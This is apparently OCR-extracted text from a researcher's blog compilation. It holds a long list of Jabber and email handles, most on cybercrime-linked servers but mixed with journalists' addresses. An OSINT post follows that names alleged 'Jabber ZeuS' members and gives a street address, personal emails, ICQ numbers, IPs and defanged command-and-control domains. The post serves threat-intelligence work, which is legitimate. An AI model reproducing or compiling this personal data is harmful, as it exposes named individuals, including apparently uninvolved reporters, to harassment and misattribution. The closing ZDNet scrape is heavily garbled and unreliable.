sweet orangel@jabber.org 
swendy@jabber.fr 
swipe-store@100500.cc 
swordfish@jabbim.com 
Sws@noicq.org 
sylarolf@jabbim.cz 
syndicates-syndicates@exploit.im 
synthetic@darkode.com 
synthetic@exploit.im 
syS@sj.ms 
sysekufu@volity.net 
sysenter@jabber.no 
syssyS@mail.ru 
systemofrecordnoname@xmpp.jp 
systro@jabber.org 
taglialucci@jabber.no 
taipan74@jabber.org.uk 
tamera@tamera.fr 
tamere@jabber.laurier.org 
tapasbesoin@jabber.dk 
tapio@xmpp.jp 
taracan@jabber.co.za 
tarantino@exploit.im 


tarantino@exploit.in 
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tasoeur@jabbix.se 
tatomato@xmpp.jp 
tavkrO63@jabber.se 
tayranr9@jabber.org 
tbacano@jabber.ru 
tbucks@jabber.org 
tcpflood@hackshop.cc 
tcpflood@jabber.dk 
td4s@jabber.org 
tdkcd@Onllne.at 
tds@aveg.me 
teamcoding@codingteam.net 
teamx@default.rs 
teamx@macjabber.de 
teardrop@swissjabber.ch 
tech _admin@jabster.pl 
tech support@exploit.im 
technician@list.ru 
ten@swissjabber.ch 
tenmax@pandion.im 
teplica@jabber.se 
tequilaa@exploit.im 
terfour@xmpp.jp 
teri@8chan.co 


teri@jabber.se 
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termos@exploit.im 
ters@jabber.cz 
tessa88@exploit.im 
tessa88@xmpp.jp 
test111@jabber.dk 
test12365@jabber.dk 
test67@jappix.com 
test@creep.im 
test@jabber.im 
test@jabbix.fr 
test@test.com 
testas@jappix.com 
tete@jappix.com 
tfoxbrewster@jabber.hot-chilli.net 
tfsupport@jodo.im 
tfyguih@uigiuhi.com 
tgk@cluster.sx 
the-eye@rows.io 

the _bond@jabber.org 
theblacklotus@xmpp.cz 
thedonation@jabber.org 
thelastmonk@jabbim.cz 
thematrixrob@exploit.im 
theone@xmpp.ru 


thetick@jabberon.ru 
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thewim@jabber.ru 
thisisyoga@xmpp.jp 
thisisyoshka@draugr.us 
ticatictac@jaberron.ru 
tiger@exploit.im 
timliri@jabber.se 
timsjim@suchat.org 
tinygroup@exploit.im 
tiozr@tryalert.com 
tipacon@jabbim.com 
tips@pzfeed.com 
tishhenko81@mail.ua 
titesalope@xmpp.ru 
titeuff@jabber.dk 
tm.eswix@exploit.im 
tmtfamily@exploit.im 
todd2037@ajabber.me 
tokarev@jabber.ua 
tom.cheshire@sky.uk 
tomahawk@jabber.com.ua 
tomfort@jabber.ru 
tonnysapranno@exploit.im 
tony@pharaohlocksmiths.com 
tonys@riseup.net 


tonyspark@Onl1ine.at 
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tookie@pandion.im 
top-exp@xmpp.jp 
topandexp@swissjabber.ch 
topkekeroni@neko.im 
topwaren@exploit.im 
tornton@jabme.de 
torontofirst@xmpp.jp 
tort@zloy.im 
tortudemer@jappix.com 
torture@jabber.dk 
tototoh4x0r@jabber.ru 
toums@jappix.com 
towero@jabb.im 
toztoz@jabbim.cz 
tp@jabbim.com 
tpaxo@jabberd.eu 
tradecityadmin@swissjabber.ch 
tradelik@mynet.com 
tradeshow@exploit.im 
traffic-monster@swissjabber.ch 
traffic@jabber.no 
traffik@jabme.de 
traffsell@draugr.de 
traffseller@jabber.org 


traffstat@jabber.org 
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traffstoc@jabber.org 
trafikkuplyu@jabber.no 
traflow@jabbim.cz 
traflow support@jabbim.cz 
trafmarketcom@xmpp.jp 
train5@exploit.im 
tranzistor@exploit.im 
trash.ezes@yandex.ru 
treasure@climm.org 
trenchik@exploit.im 
trevel@xta.im 
trezy@exploit.im 
trigger77@xmpp.jp 
trikx@exploit.im 
trikx@jabber.se 
trisoft@zloy.im 
trj32@exploit.im 
trops@exploit.im 
tros2002@exploit.im 
troter@jabbim.com 
troyhunt@xmpp.is 
truemoney@xmpp.jp 
trunorth818688@jabber.hot-chilli.net 
trust@exploit.im 


trustdeal@exploit.im 
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trusted.24h@Onl1Lne.at 
trusted@Onl1ne.at 
truth-mm@aqq.eu 
truth-mm@jabbim.pl 
ttoto@xmpp.jp 
tuner@xep.li 
tunnels@exploit.im 
tuos@jabber.se 
tupolev@ubuntu-jabber.net 
turboreacteur@xmpp.jp 
twente@jabber.org 
twentyfourtwenty@jabber.ccc.de 
tycoon1337@exploit.im 
tylertylertylertyler666@xmppcomm.com 
tymblep@jabber.ru 
typuct@exploit.im 

typuct tcupyt@jabber.ru 
tytorial@jabber.se 
uas-admin@sj.ms 
uas-admin@xmpp.name 
uasweb@jabber.ru 
uatraffic@linuxlovers.at 
uchiha@thug.org 
uckel@pandion.im 


udu4a@exploit.im 
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ug.Sales@jabber.ru 
ug@fbi.gov 
uglegion300@jabber.se 
ujahmubo@omega.amg.gda.pl 
ukash.wmz@jabber.ru 
ukdeadfullz@xmpp.jp 
uknowme@exploit.im 
ukrxchange@jabber.org 
ulcan@jabber.cz 
ullyse@neko.im 
umady@exploit.im 
uncle1@Onl1Lne.at 
uncle@Online.at 
uncle@jaim.at 
unclebob@hot-chilli.net 
understand@jabber.hot-chilli.net 
undertaker@crypt.am 
underworldseller@jabb3r.org 
uni007@jabber.org 
unjouralafois75@outlook.com 
unknownkind@jabber.org 
unknownko@xmpp.jp 
unknownuser1337@exploit.im 
unol@exploit.im 


upman@jabber.cz 
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upo@exploit.im 
uralrezina@exploit.im 
useb2016@qip.ru 
user876876@jabber.se 
user@domain.name 
user@exploit.im 
user@jabber.org 
user@nimbuzz.com 
user@ninja.im 
user@xmpp.new-crew.net 
userid@jabber.cz 
userid@jabber.no 
usernamex2@default.rs 
userwell777@cluster.sx 
uzberator@inbox.ru 
uziuser@kaddafi.me 
v777@Online.at 
v@xmpp.ru 
vadim-123@jabber.no 
vag@Onlline.at 
vagabd@wwf.tl 
vahta@jabber.cz 
vaiol@default.rs 
vaioo@xmpp.jp 


valdemar@default.rs 
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validccseller@xmpp.jp 
validrock@sj.ms 
vanille@exploit.im 
vano-96123@yandex.ru 
vaporz@duckgo.com 
vasean@jabber.se 
vash _nik@exploit.im 
vault@exploit.im 
vaultmarketofficial@jabb3r.de 
vbvcard@jabber.at 
vbvcard@xmpp.jp 
vbvman@jabbim.cz 
vbvman@sj.ms 
vc@cock.li 
vc@xmpp.is 
vegass/77@jabber.ru 
venik@korovka.pro 
venkings@xmpp.jp 
verifi@jabber.com 
verified.st@exploit.im 
verified@sj.ms 
versacelapute@59.org 
vestI@exploit.im 
vestman@xmpp.jp 


victor132@xmpp.jp 
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victorsxe@default.rs 
vilio@exploit.im 
vincenzo@exploit.im 
vinny@exploit.im 
vip3rghost@xmpp.jp 
virusras@exploit.im 
vistal@exploit.im 
vitaxa94@exploit.im 
vitocarleone@jabber.ru 
vitos@xmpp.jp 
vitoscaletal975@jabber.com 
vixrs@jabbim.com 
vizg@xmpp.jp 
vk-Ssmart@mail.ru 
vkashu12@xmpp.jp 

vlad _bond234@bk.ru 
viadbndarchuk@rambler.ru 
viadimir.moroz2010@mail.ru 
viadist 85@mail.ru 
vladpaypall@akl.It 
vmad@zsim.de 
vndt@swissjabber.ch 

vo dela@Online.at 
vodem@tutanota.com 


volandino@jabber.se 
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volcom@xmpp.jp 
volga888@xmpp.jp 
volga@draugr.us 
volhav@exploit.im 
volhav@jabber.se 
volt@dlab.im 
vor@jodo.im 
vorbis@exploit.im 
vorobey911@exploit.im 
vorobeys@exploit.im 
voron999@jabber.se 
vovanm6432@bestjabber.com 
vovascan@exploit.im 
vox7@jabber.org 
vpq@thesecure.biz 
vr@jabber.support 
vsevolod.boroda@xmpp.jp 
vss@neko.im 
vure@exploit.im 
vybzkardel@jabber.at 
vzlom.gold@xmpp.jp 
vzzha@xmpp.jp 
wOrm@cih.ms 
w@inbox.ru 


waah __@dlab.org.in 
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waahoo@exploit.im 
wabsonsec@jabbim.com 
wakeup@codingteam.net 
wallace@cvv.im 
wallira@jpp.it 
wallstreet88@exploit.im 
walqry@mail.ru 
ward0821@jabber.piratenpartei.de 
warnerbros@exploit.im 
waydam@exploit.im 
waytopay@jabbim.cz 
weber@exploit.im 
webinjector309h@exploit.im 
webmoneynos@mail.ru 
webprofile@xmpp.jp 
webshell1684@linux.pl 
webshell8763@jabber.justlan.ru 
weby@exploit.im 
weedy321@jabber.se 

well coding@swissjabber.ch 
wellsfargo@jabber.cz 
weqwewq@insorg-mail.info 
weron28@jabber.com 
wert@jabber.se 


werter@exploit.im 
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wesley.lowery@washpost.com 
weston4007@jabber.dol.ru 
westwood@xabber.de 
weter@pandion.im 
weter@prv.name 
weter@securejabber.me 
wetterfrosch@jabber.berlin.ccc.de 
wfrabota@exploit.im 
wfs@dlab.im 
whardbank@sissjabber.ch 
whidow@jabbim.cz 
white@jabber-server.de 
whiteagle@safe-mail.net 
whitehole2013@jabber.cz 
whitehole@thesecure. biz 
widower@prv.name 
willey@jabbim.cz 
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webserver@jaim.at 


weby@exploit.im 
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wellsfargo@jabber.cz 
wellsfargo@sj.ms 
wfh@xmpp.jp 
white.rabbit@xmpp.jp 
white black@xmpp.jp 
whitedwarf@xmpp.jp 
whiterabbitsupp@xmpp.jp 
whitesmoker@xmpp.jp 
winlock@xmpp.jp 
wizduck@exploit.im 
wolf online@jabber.org 
workpride@xmpp.jp 
wu-tanilada@xmpp.jp 
wwh _study@xmpp.jp 
x-ware@exploit.im 
x013@xmpp.jp 
x@exploit.im 
xakep.ru@jabber.org 
xakevo@xmpp.jp 
xatuko@exploit.im 
xaxaxa43@jabber.kiev.ua 
xchange@exploit.im 
xehanort@exploit.im 
xehanort@jabber.org 


xein.x@exploit.im 
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xelper@exploit.im 
xeru@blah.im 
xerucide@blah.im 
xerucide@jabber.org 
ximik.help@xmpp.jp 
xoogsade@xmpp.jp 
xooowlilwooox@jabber.org 
xxlsandora777@exploit.im 
xyz888sup@xmpp.jp 
y2k@thesecure. biz 
yagpanzer@exploit.im 
yam@jabber.org 
yarat@jabber.no 
yasen@exploit.im 
yep@xmbtc.jp 
yezzzshop@xmpp.jp 
ymsmd@jabber.org 
youngrasta@exploit.im 
youngrasta@rows.io 
yrl1@xmbtc.jp 

yukkuri _sinai@jabber.cz 
yukkuri sinai@xmpp.jp 
zlnked@xmpp.jp 
z3r0@exploit.im 


z3r0code@jabber.cn 
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zbyer@cnw.bz 
zemela@jabber.org 
zerOday@xmpp.jp 
zerg557@jabber.org 
zerg557@jabber.ru 
zerohero@xmpp.jp 
zerotrack@xmpp.jp 
zhulikk@xmpp.jp 
zigma@jabber.org 
ziigger88@exploit.im 
zinkpro@exploit.im 
zip@exploit.im 
zipp777@exploit.im 
zlobnijg@exploit.im 
zone45@neko.im 
zorg1@exploit.im 
zservers@xmpp.jp 
zservers@xmpp.ru 
zubr24@exploit.im 
zudosek@xmbtc.ru 
zudosek@xmpp.ru 
zyklon@jabber.org 
0a04xd4@tutanota.com 
Orn@protonmail.com 


Oxd15abled@evil.im 
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lup@creativemindfra.me 
404notfound@jabber.calyxinstitute.org 
6d46cb54a1@jabber.calyxinstitute.org 
aaron.rogan@the-times.ie 
abby@miku.li 
acldb1itch3z@riseup.net 
acouts@thedailydot.com 
actaeOn@null.pm 
activaah@xmpp.jp 
admin@2sec4u.com 
admin@8ch.net 
admin@cyberwarnews.info 
admin@spainsquad.com 
ak8@wtfismyip.com 
alex.hern@theguardian.com 
alex@backroom-entertainment.de 
algod@riseup.net 

aln@evil.im 

amateurz@riseup.net 

angelique _1991@mail.ru 
anil@dashes.com 
anonymousteam@jabber.se 
anxiety@live.ru 

archos@xmpp.ru 


arlington@og.|c 
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ashley _feinberg@wired.com 
asio are skids@exploit.im 
assessoria@boogienaipe.com.br 
autism1@nigge.rs 
autismusprimus@exploit.im 
aza@xmpp.jp 
binary@jabber.ccc.de 
bang@nigge.rs 
banksy@ponmf.cat 
bd061@xmpp.jp 
beezysama@reborn.com 
bellaeikomedia@me.com 
ben.jacobs@theguardian.com 
ben.sullivan@vice.com 
beng2@nebengers.com 
berry@gorf.club 
berry@shitposter.club 
berserk@darkness.su 
bigbootyitaly@libero. it 
bigstrongblackman@jabber.at 
binaryproxy@protonmail.com 
bio@exploit.im 
bitchiest@jabber.org 
blackknight @xmpp.jp 


bltsandwhich@riseup.net 
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blue@pandafunk.com 
blunts@420blaze. it 


bookings@fredospazz.com 


braziliancyberarmy@protonmail.com 


breaches@protonmail.ch 
breaches@securejabber.me 
bula@xmpp.jp 
bulwark@riseup.net 
business@darerising.gg 


business@imallexx.com 


business@silversanction.com 


c43p3r@protonmail.com 
cancer@cocaine.ninja 
candyplz@riseup.net 
carbonic@riseup.net 
casper@xmpp.cm 
catsmeowalot@cock.li 
cayman@sks-media.co.uk 
chapters@xmpp.jp 

chris. hamby@buzzfeed.com 
cloge@exploit.im 
clayton@soar.gg 
cody@soundrink.com 
coldblooded@crypt.mn 


comandos@protonmail.com 
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contact@cappconcepts.gg 
contact@dzresurge.net 
contact@govtslaves.info 
contact@inthesolarhq.com 
contact@megaran.com 
contact@sktagency.com 
contact@thejg.xyz 
contact@thejoinery.jp 
contact@ultraarena.com 
contact@vazzera.com 
contact@viralized.com 
contacto@ecamptalent.com 
contato@marcogomez.com.br 
cosmo@viral.net 
covertthegod@exploit.im 
craig.silverman@buzzfeed.com 
criminal@live.ca 
criminal@live.ie 
criminal@live.nl 
curavit@protonmail.com 
cwn@riseup.net 
cybercored@protonmail.com 
dOxology@protonmail.com 
d3f4ult@protonmail.ch 


d4ne@riseup.net 
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d4rkm0Onk@protonmail.ch 
d@gnu.gr 

dal@riseup.net 
dana@entitledmgmt.com 
darkdreamer@xmpp.jp 
darkmatter@jabber.se 
darkmatter@xmpp.jp 
dayna@archeryclub.net.au 
de7in@xmpp.jp 
decemate@evil.im 
defiant@creep.im 
defiant@crypt.mn 
dgsec@dukgo.com 
dgsec@sigaint.org 
dinlas@jabber.calyxinstitute.org 
dlarter@navytimes.com 
dmca@leoblakecarter.co 
dongus@420blaze.it 
dopable@jabb.im 
downsecbelgium@protonmail.com 
dreamer45@protonmail.com 
drozsqt@riseup.net 
duffy.conor@abc.net.au 
economicmayhem@suchat.org 


eduardo@adie.com.br 
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egeller@politico.com 
ekinetz@ap.org 
elcat@riseup.net 
elgOdO0@elgOd0.club 

elliot axor@creep.im 
ellyel8@jabber.ccc.de 
email@andrewalker.uk 
emz@redreserve.org 
endodw@protonmail.ch 
enquiries@ctl-artists.com 
eve@hackerhuntress.com 
evilkermit@protonmail.com 
explOit@xmpp.jp 
exploitkit@jabb3r.org 
fOx@jabber.vc 
federal@exploit.im 
felon@thug.org 

fermi _cryptostorm@jabber.calyxinstitute.org 
finesse@xmpp.jp 
finessekid@exploit.im 
flashylol@exploit.im 
flex@fbi.al 
floppy@riseup.net 
formal@jabber.lqdn.fr 


g4mm4@xmpp.jp 
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gamergatecouncil@redchan.it 
geoff@gwhite.info 
gerard.tubb@sky.uk 
gfc@swissjabber.ch 


ghetto@trendssocial.com 


ghostre4per@jabber.calyxinstitute.org 


globalanarch@creep.im 
god@father.net 
grantd@csps.com 
greg.miller@washpost.com 
grim@crimin.al 
hO7wir3@jwchat.org 
h4xofficial@protonmail.com 
hackerorientado@protonmail.com 
heather@atlastalent.com 
hello@rachaelpr.com 
hello@yesqgarts.com 
help@quantumbooter.net 
helpedsnowden@protonmail.com 
hi@getmefamous.com 
hi@jaxxangency.com 
hicks@5550199.com 
hinamore@jabb3r.org 
host@Oday.ms 


iduncan@baltsun.com 
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ih8snOw@ih8snOw.com 
include@swissjabber.ch 
infinity@jabber.se 
info@andresoriano.com 
info@belizehub.com 
info@bizarremanagement.com 
info@downloadmoreram.com 
info@hackersonlineclub.com 
info@ic3d.net 
info@kismetrecords.com 
info@pabucumunlordu.com 
info@radiusartists.com 
info@romero.com 
info@tubehouse.tv 
info@year0001.com 
inpurity@xmpp.jp 
inquiries@lucky7gaming.org 
inquiries@slogansocial.com 
intrusive@riseup.net 
investigations@thomsonreuters.com 
isba.tech@szcua.org 
j.evers@protonmail.ch 
j4x@exploit.im 

j@silosec.org 


janawinter@protonmail.com 
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jaSon@soar.gg 
jasper.hamill@the-sun.co.uk 
jenna.mclaughlin@foreignpolicy.com 
jfcox@jabber.ccc.de 
jihad@muslim.com 
joe.mullin@arstechnica.com 
john.muyskens@washpost.com 
jonas.rest@manager-magazin.de 
jordan.smith@theintercept.com 
joseph.cox@vice.com 
josh.butler@huffingtonpost.com.au 
josh@fbi.tf 

k2@evil.im 

kaliroot@xmpp.jp 
kantorkel@ffnord.net 
kayntias@digitalgangster.com 
kelly.bourdet@gizmodo.com 
kelly@rm-rf.ninja 

kermit@evil.im 
khalidinfo@righthandmusicgroup.com 
khall@theregister.com 
kiwiz@redreserve.org 
kodak@blah.im 
komodough@exploit.im 


kpn@tuta.io 
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kriminal@creep.im 
kurizma@eunited.gg 
laksoh@darerising.gg 
lasgodfather@xmpp.jp 
layer7inc@protonmail.com 
leakbase@creep.im 
leakedsource@chatme.biz 
leviunknown@jappix.com 
lolcow@crypt.mn 
lounge@dead.irc.land 
Is@nigge.rs 

luke@naventic.gg 
lukegirgis@belikechildren.com 
mOnk@jabber.calyxinstitute.org 
madler@paradigmagency.com 
manager@brihansuarez.pe 
matt@afterdarkartists.com 
matt@freenode.net 
matt@philie.com 
mattmrx@csa.gg 
maul@evil.im 

maven@csa.gg 
max.hoppenstedt@vice.com 
maxheadroom@digitalgangster.com 


mb@xato.net 
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mckayla@jabber.se 
md5@xmpp.jp 
md5@xmpp.land 
me@godly.net 
mena.mikhail@aol.com 
menuxi@riseup.net 
merce@protonmail.ch 
mgmt@drelondon.com 
mgordon@fullscreen.com 
mgt@christanlgrant.com 
mh@evil.im 
mickymouse12@exploit.im 
mikey.smith@mirror.co.uk 
milkbOne@riseup.net 
minimal@Isd-25.ru 
mitchmurder@dxseven.com 
molotoving@jabb3r.org 
mongolian@riseup.net 
mons@memeware.net 
moonzy@redreserve.org 
mrcashiers1@jabber.se 
mulato@exploit.im 
muz@falcona.com.au 
nadia@mokkingbird.com 


negative@live.co.uk 
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neil@insanitygroup.com 
neo@null.pm 
neoundergrond@bk.ru 
neslo@echofox.gg 
netta@thisisthemovement.org 
networking@tutamail.com 
nezla@evil.im 
nhayase@riseup.net 
nicholas.deleon@motherboard.tv 
nickreddick@primarytalent.com 
nikki@teallmanagement.com 
nitasha _tiku@wired.com 
nix@evil.im 
notes@silversanction.com 
novathefed@xmpp.jp 
nozomu@neko.li 
nscola@politico.com 
nullboom@jabber.se 
nxf@evil.im 

nxro@xmpp.com 
nympho@riseup.net 
oakkaya@crypt.mn 
observernokuro@protonmail.com 
oedipus@xmpp.jp 


og@jabbim.cz 
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oliver.laughland@theguardian.com 
oooo@riseup.net 
opgOd@riseup.net 
optic@revxp.com 
opyemen@riseup.net 
packet@null.pm 
pain@blackjabber.cc 
panic@riseup.net 
para@riseup.net 
pecxr00t@creep.im 
pixelOrd@riseup.net 
pjs@wmeentertainment.com 
plasticmodem@programmer.net 
pmck@pmcklive.com 
pop@blackhat.cat 
poptartpounder@nigge.rs 
posters@worldstarhiphop.com 
prOb@jabber.se 
press@remove.pm 
press@vvpllc.com 
program@ardanradio.com 
proud@ponf.cat 
prvlulz@sigaint.org 
pureelite@conference.riseup.net 


purplecolor@blackjabber.cc 
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r0O0tsecur@xmpp.jp 
r3a@og.dk 

r@raylo.co 
racks@xmpp.jp 
raffi@strategiccyber.com 
raincoaster@unseen.is 
rapefugee@europe.com 
raun@riseup.net 
raymond.b@fuzagaming.us 
razorblade@Online.cc 
redhack@activist.com 
refracts@lucky7.gg 
reklamajansi@mail.com 
rgctree@icloud.com 
richard.holmes@buzzfeed.com 
richiemalone@aol.com 
rift@xmpp.jp 
risatan@riseup.net 
riu1872@jabber.se 
roOted@riseup.net 
robert.k@techie.com 
root@ic.fbi.gov 
root@leakbase.pw 
ryan@exploit.im 


ryan@rjgallagher.co.uk 
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ryan@rm-rf.ninja 
ryan@thug.org 

s@sad.men 
salem@jabber.otr.im 
sarah.isgur.flores@usdoj.gov 
sasukels@exploit.im 
sauli@jabber.otr.im 
sceditorial@haymarket.com 
scene@black.intoxvs.info 
sean@evil.im 
secluded@evil.im 
secure@microsoft.com 
semaj@jabber.se 
servers@crypt.mn 
sest@protonmail.ch 
sheldon@creep.im 
shenron@evil.im 
sherazali@royallepage.ca 
shm00p@lowermyjews.org 
shockanon@protonmail.com 
shodan@darkness.su 
shows@badazzmusic.com 
sicario@creep.im 
sifying@swissjabber.ch 


sinful@darkness.su 
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skyberry86business@aol.com 
slacka@nigge.rs 
snipersnague@xmpp.jp 
social@ironbuttz.com.au 
sohcra@riseup.net 
soulmech@creep.im 
soulmech@cryptostorm.is 
spencer.ackerman@thedailybeast.com 
spencerackerman@protonmail.com 
spite@riseup.net 
spoof@thug.org 
stackoverflowin@tuta.io 
stank@blah.im 
steve@cnbc.com 
strive@null.pm 
stunned@xabber.de 
sudosev@protonmail.ch 
superspooki@exploit.im 
support@lookout.com 
support@ohrange.co 
support@spinrilla.com 
syncing@darkness.su 
syriancyberarmy@xtcmail.com 
tanzer@darerising.gg 


teampOison@riseup.net 
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technology@huffingtonpost.com 
teepa@xmpp.jp 
teepee@csa.gg 
tehlulzywolf@jabber.otr.im 
telnet@Isd-25.ru 
teri@jabber.se 
test123@Onl1Lne.cc 
theoriginalyurei@xmpp.zone 
theralph@theralphretort.com 
tim@tagg.ly 
tips@popsci.com 
tips@techcrunch.com 


tmu@thug.org 


tommyb@creativesoulsmediagroup.com 


tongue@rickyberwick.com 
topol@tormail.org 
twitter@gusclass.com 
uchiha@thug.org 
ug@fbi.gov 

ug@jabber.se 
uglegion300@jabber.se 
unity.exe@riseup.net 
vOld4m0rt@protonmail.com 
v8@evil.im 


v8@exploit.im 
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vanda@vandathegod.com 
vc@cock.li 

vc@xmpp.is 
vegard@ufa.no 
vicious@riseup.net 
vickie@whitemanagement.co.uk 
videosawesome@mail.com 
vil@nigge.rs 

vill@xmpp.jp 
violentexploit@xor.li 
vito@relyy.com 
voidsta@riseup.net 
volatile@digitalgangster.com 
voxi@evil.im 
warfare@live.com 
waters@lucky7.gg 
will@wstraf.me 
william@theoutline.com 
windanon@riseup.net 
wtf@protonmail.ch 
x64bit@exploit.im 
xeaned@swissjabber.ch 
xev@xmpp.jp 
yurei@yax.im 


z@exiled.si 
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Z@goat.si 
zen@exploit.im 
zihnmp@cocaine.ninja 
zmb@jabber.se 
zora@jabb3r.de 


zyqnic@jappix.io 


We'll post new updates and will update this list as soon as new developments take place. 


. https: //ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards_31.htm 


1 
2. https://otr.cypherpunks.ca/ 

3. https://electrospaces. blogspot .com/2017/06/dutch-russian-cyber-crime-case-reveals.htm 
4. https: //en.wikipedia.org/wiki/Lawful_interceptio 


15.6.5 Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An 
OSINT Analysis (2019-07-29 17:18) 


Continuing the "[1]FBI Most Wanted Cybercriminals" series I’ve decided to take a closer look 
at the "Jabber ZeuS" including [2]Evgeniy Mikhaylovich Bogachev for the purpose of providing 
actionable intelligence on the fraudulent and malicious infrastructure that was utilized in the 
campaign including personally identifiable information of the individuals behind it with the 
idea to assist law enforcement and the U.S Intelligence community with the necessary data to 
track down and prosecute the individuals behind the campaign. 


In this post I’ll provide actionable intelligence on the infrastructure used by the "Jabber 
ZeuS" gang including personally identifiable information for Evgeniy Mikhaylovich Bogachev 
and some of his known associates. 


Sample Personal Photos of Evgeniy Mikhaylovich Bogachev: 
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Slavik’s IM and personal email including responding IP: 


bashorg@talking.cc - 112.175.50.220 


Personal Address: 


Lermontova Str. Anapa, Russian Federation 


Instant Messaging account: 


lucky12345@jabber.cz 


Related name servers: 
ns.humboldtec.cz - 88.86.102.49 


ns2.humboldtec.cz - 188.165.248.173 
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Related domains part of a C &C phone-back location: 
hxxp://slaviki-resl.com 

hxxp://slavikl.com - 91.213.72.115 
hxxp://slavik2.com 


hxxp://slavik3.com 


Slavik’s primary email: 


luckycats2008@yahoo.com 


Slavik’s ICQ numbers: 
ICQ - 42729771 


ICQ - 312456 


Related emails known to have participated in the campaign: 
alexgarbar-chuck@yahoo.com 
bollinger.evgeniy@yandex.ru 


charajiangl16@gmail.com 


Related domains known to have participated in the campaign: 


hxxp://visitcoastweekend.com - 103.224.182.253; 70.32.1.32; 192.184.12.62; 141.8.224.93; 
69.43.160.163 


hxxp://incomeet.com - 192.186.226.71; 66.199.248.195 


hxxp://work.businessclub.so 
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Related information on his colleague (chingiz) as seen in the attached screenshot: 


Zeus 2 vs. Zeus 2+ 
Is the Zeus Project really dead? 


Real Name: Galdziev Chingiz 


Related domains known to have participated in the campaign: 
hxxp://fizot.org 
hxxp://fizot.com - 50.63.202.35; 184.168.221.33 


hxxp://poymi.ru - 109.206.190.54 


Related name servers known to have participated in the campaign: 


nsl1.fizot.com - 35.186.238.101 
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ns2.fizot.com 


Related domain including an associated email using the same name server: 


hxxp://averfame.org - harold@avereanoia.org 


Google Analytics ID: UA-3816538 


Related domains known to have participated in the campaign: 
hxxp://awmproxy.com 


hxxp://pornxplayer.com 


Related emails known to have participated in the campaign: 
fizot@mail.ru 
xtexgroup@gmail.com 


xtexcounter@bk.ru 


Related domains known to have responded to the same malicious and fraudulent IP - 
178.162.188.28: 


hxxp://dnevnik.cc 
hxxp://xvpn.ru 
hxxp://xsave.ru 
hxxp://anyget.ru 
hxxp://nezayti.ru 
hxxp://proproxy.ru 


hxxp://hitmovies.ru 
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hxxp://appfriends.ru 
hxxp://naraboteya.ru 
hxxp://naraboteya.ru 
hxxp://awmproxy.com 
hxxp://zzyoutube.com 
hxxp://pornxplayer.com 
hxxp://awmproxy.net 


hxxp://checkerproxy.net 


Related domains known to have participated in the campaign: 


hxxp://fizot.livejournal.com/ 


hxxp://russiaru.net/fizot/ 


Instant Messaging Account: 


ICQ - 795781 


Related personally identifiable information of Galdziev Chingiz: 


hxxp://phpnow.ru 
ICQ - 434929 


Email: info@phpnow.ru 


Related domains known to have participated in the campaign: 


hxxp://filmv.net 
hxxp://finance-customer.com 


hxxp://firelinesecrets.com 
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hxxp://fllmphpxpwqeyhj.net 


hxxp://flsunstate333.com 


Related individuals known to have participated in the campaign: 

Slavik, Monstr, lOO, Nu11, nvidiag, zebra7753, lexa_Mef, gss, icelX, Harderman, Gribodemon, 
Aqua, aquaSecon4d, it, percent, cp01, hct, xman, Pepsi, miami, miamibc, petrOvich, Mr. ICQ, 
Tank, tankist, Kusunagi, Noname, Lucky, Bashorg, Indep, Mask, Enx, Benny, Bentley, Denis 
Lubimov, MaDaGaSka, Vkontake, rfcid, parik, reronic, Daniel, bx1, Daniel Hamza, Danielbx1, 
jah, Jonni, jtk, Veggi Roma, D frank, duo, Admin2010, h4xOrdz, Donsft, mary.J555, susanneon, 


kainehabe, virus e 2003, spaishp, sere.bro, muddem, mechanizm, vlad.dimitrov, jheto2002, 
sector.exploits 


Related Instant Messaging accounts and emails known to have participated in the cam- 
paign: 


iceix@secure-jabber. biz 
shwark.power.andrew@gmail.com 
johnlecun@gmail.com 
gribodemon@pochta.ru, 
glazgo-update-notifier@gajim.org 
gribo-demon@jabber.ru 
aqua@incomeet.com 
miami@jabbluisa.com 
um@jabbim.com 
hof@headcounter.org 
theklutch@gmail.com 
niko@grad.com 
Johnny@guru.bearin.donetsk.au 
petrOvich@incomeet.com 


mricq@incomeet.com 
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T4ank@ua.fm 
tank@incomeet.com 
getreadysafebox.ru 
john.mikleymail.com 
alexeysafinyahoo.corn 
rnoscow.berlin@yahoo.com 
cruelintention@email.ru, 
bind@ernail.ru 
firstmen17@rarnbler.ru 
benny@jabber.cz 
airlord1988@gmail.com 
bxI@hotmail.com 

i amhere@hotmail.fr 
daniel.h.b@universityofsutton.com 
princedelune@hotmail.fr 
bxl_ @msn.com 
danibx|@hotmail.fr 
danieldelcore@hotmail.com. 
d.frank@jabber.jp 
d.frank@Onl1ine.at 
duo@jabber.cn 
fering99@yahoo.com 
secustar@mail.ru 
h4x0rdz@hotmail.com 


Donsft@hotmail.com 
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mary.j555@hotmail.com 
susanneon@googlemail.com 
kainehabe@hotmail.com 
virus e@ 2003@hotmail.com 
spanishp@hotmail.com 
sere.bro@hotmail.com 
lostbuffer@hotmail.com 
lostbuffer@gmail.com 
vlad.dimitrov@hotmail.com 
jheto2002@gmail.com 


sector.exploits@gmail.com 
We'll post new updates as soon as new developments take place. 


Related posts: 
[3]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis 


[4]Who’s Behind the Syrian Electronic Army? - An OSINT Analysis 


1. : : : 
2. https: //www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogache 

3. https: //ddanchev.blogspot .com/2019/01/exposing-irans-most-wanted. htm 
4. ; ; : 


https: //ddanchev. blogspot .com/2019/07/whos-behind-syrian-electronic-army.htm 


https ://ddanchev. blogspot. com/2019/07/whos-behind-syrian-electronic-army.htm 


15.6.6 Summarizing 4 Years of ZDNet Zero Day Posts Research (2019-07-29 18:28) 
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Home News & Blogs Videos White Papers Downloads Reviews Popular 


Ryan Naraine, Dancho Danchev & Adam O'Donnell 
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ZDNet Must Reed. 
Code execution flaws haunt OpenOffice 


The flaws, whkh affect af versions price to OpenOffice.org 2.4.2, could be 
exploted via manoutated WHF and EMF files in StarOffice of StarSute 
socuments ortinwed » 


October 30th, 2008 
Happy 20th birthday, internet worm! 


Cotegorian: Hecker Youre 
Voges Lonereet We 
46am 2 basse! 


eW stapes -S 2 2 & OH 


This weekend marks the 20th anniversary of the Internet Worm, the first 
major worm that propagated on the Internet. Even though many years 
have passed and underlying meda has changed, worms are still able to 
wreak havoc and keep system adrwwstrators up at reght. Today the 
damage done by worms is far less visible and far less newsworthy but far 
more Gfficutt to repaw than m the past 

Read the rest of this entry » 


October 30th, 2008 

